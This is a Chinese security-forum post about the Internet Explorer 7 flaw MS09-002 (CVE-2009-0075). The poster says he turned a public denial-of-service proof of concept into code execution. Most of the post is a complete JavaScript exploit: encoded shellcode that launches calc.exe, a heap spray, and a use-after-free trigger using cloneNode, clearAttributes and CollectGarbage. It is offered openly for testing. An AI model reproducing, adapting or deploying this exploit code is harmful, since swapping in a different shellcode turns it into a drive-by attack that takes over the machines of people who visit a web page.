- 论坛徽章:
- 0
|
Microsoft IE CFunctionPointer函数内存破坏漏洞(MS09-002)\r\n发布时间:2009-02-10\r\n影响版本:\r\nMicrosoft Internet Explorer 7.0\r\n\r\n漏洞描述:\r\nBUGTRAQ ID: 33627\r\nCVE(CAN) ID: CVE-2009-0075\r\n\r\n\r\nComment by Friddy:\r\n这个实际不是个破坏内存的漏洞,可以利用这个漏洞执行任意的代码。\r\n今天我花了十几分钟修改了miliw0rm的只会造成DOS的POC,现在已经可以较为稳定执行任意代码。\r\n\r\n测试平台:\r\nWindows XP SP2+Internet Explorer 7.0\r\n\r\n下面发出POC给各位安全爱好者测试,测试效果是弹出Windows的计算器(calc.exe)- <!--\r\nMS09-002 Internet Exploere 7.0 Exploit\r\nModify by Friddy 2009.02.19 mail:qianyang@ssyeah.com\r\nblog:www.friddy.cn\r\nTested under Windows XP sp2+IE 7.0\r\nshellcode will popup the calc.exe\r\n-->\r\n\r\n<script language=\"JavaScript\">\r\nvar shellcode=unescape(\"%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063\");\r\n\r\nvar array = new Array();\r\n\r\nvar ls = 0x100000-(shellcode.length*2+0x01020);\r\n\r\nvar b = unescape(\"%u0D0D%u0D0D\");\r\nwhile(b.length<ls) { b+=b;}\r\nvar lh = b.substring(0,ls/2);\r\ndelete b;\r\n\r\nfor(i=0; i<0xD0; i++) {\r\narray[i] = lh + shellcode;\r\n}\r\n\r\nCollectGarbage();\r\n\r\nvar s1=unescape(\"%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA\");\r\nvar a1 = new Array();\r\nfor(var x=0;x<500;x++) a1.push(document.createElement(\"img\"));\r\no1=document.createElement(\"tbody\");\r\no1.click;\r\nvar o2 = o1.cloneNode();\r\no1.clearAttributes();\r\no1=null; CollectGarbage();\r\nfor(var x=0;x<a1.length;x++) a1[x].src=s1;\r\no2.click;\r\n</script>
复制代码 |
|